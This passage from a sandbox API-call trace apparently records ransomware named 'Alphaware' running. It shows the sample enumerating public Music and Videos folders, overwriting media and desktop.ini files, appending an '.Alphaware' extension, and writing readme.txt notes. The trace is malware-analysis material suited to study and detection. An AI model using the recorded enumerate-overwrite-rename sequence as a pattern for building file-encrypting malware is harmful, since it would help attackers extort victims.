"c:\\users\\public\\music\\sample music\\kalimba.mp3.alphaware")) returned 1 [0103.294] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3", dwFileAttributes=0x80) returned 1 [0103.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0103.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x24cc408 | out: lpFileInformation=0x24cc408*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2)) returned 1 [0103.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0103.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0103.399] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0103.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0103.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0103.473] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec40 | out: lpFileInformation=0x23ec40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8fdc7ee0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x25d36d)) returned 1 [0103.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8c8) returned 1 [0103.474] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.Alphaware" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.alphaware")) returned 1 [0103.475] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3", dwFileAttributes=0x80) returned 1 [0103.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0103.475] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23cd080 | out: lpFileInformation=0x23cd080*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459)) returned 1 [0103.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0103.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0103.601] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0103.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0103.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0103.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec40 | out: lpFileInformation=0x23ec40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x90003380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8779)) returned 1 [0103.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8c8) returned 1 [0103.703] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.Alphaware" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.alphaware")) returned 1 [0103.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0103.704] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x90003380, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x90003380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f7ae680, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8fc24fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4d5ab5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3.Alphaware", cAlternateFileName="")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8fdc7ee0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x25d36d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3.Alphaware", cAlternateFileName="MAIDWI~1.ALP")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7ae680, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8f7ae680, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8f7ae680, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x90003380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8779, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3.Alphaware", cAlternateFileName="SLEEPA~1.ALP")) returned 1 [0103.705] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x90003380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8779, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3.Alphaware", cAlternateFileName="SLEEPA~1.ALP")) returned 0 [0103.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0103.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0103.705] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0103.705] SHGetFolderPathW (in: hwnd=0x0, csidl=55, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\Public\\Videos") returned 0x0 [0103.707] CoTaskMemFree (pv=0xd85a10) [0103.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0103.707] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.707] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0103.708] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0103.708] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0103.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0103.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0103.708] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0103.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0103.709] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2573460 | out: lpFileInformation=0x2573460*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0103.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0103.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0103.709] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x268 [0103.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0103.709] ReadFile (in: hFile=0x268, lpBuffer=0x25737e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25737e8*, lpNumberOfBytesRead=0x23eb38*=0x17c, lpOverlapped=0x0) returned 1 [0103.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0103.733] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x268 [0103.734] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0103.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0103.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x9004f640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8)) returned 1 [0103.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0103.736] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Videos\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\videos\\desktop.ini.alphaware")) returned 1 [0103.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0103.738] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\readme.txt" (normalized: "c:\\users\\public\\videos\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x268 [0103.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0103.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0103.740] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9004f640, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9004f640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x9004f640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9004f640, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x9004f640, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9004f640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0103.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0103.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0103.741] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0103.742] FindNextFileW (in: hFindFile=0xd8a730, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0103.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0103.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0103.742] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0103.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0103.743] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23f7f00 | out: lpFileInformation=0x23f7f00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146)) returned 1 [0103.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0103.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0103.743] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x268 [0103.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0103.743] ReadFile (in: hFile=0x268, lpBuffer=0x23f8290, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23f8290*, lpNumberOfBytesRead=0x23ea98*=0x146, lpOverlapped=0x0) returned 1 [0103.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0103.765] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x268 [0103.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0103.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0103.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x9009b900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x288)) returned 1 [0103.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0103.767] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.alphaware")) returned 1 [0103.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0103.768] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\readme.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x268 [0103.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0103.770] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", dwFileAttributes=0x80) returned 1 [0103.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0103.770] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), fInfoLevelId=0x0, lpFileInformation=0x247bb08 | out: lpFileInformation=0x247bb08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a)) returned 1 [0103.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0105.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0105.857] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x268 [0105.859] GetFileType (hFile=0x268) returned 0x1 [0105.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0105.859] GetFileType (hFile=0x268) returned 0x1 [0105.859] WriteFile (in: hFile=0x268, lpBuffer=0x24126b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea88, lpOverlapped=0x0 | out: lpBuffer=0x24126b0*, lpNumberOfBytesWritten=0x23ea88*=0x1000, lpOverlapped=0x0) returned 1 [0105.861] WriteFile (in: hFile=0x268, 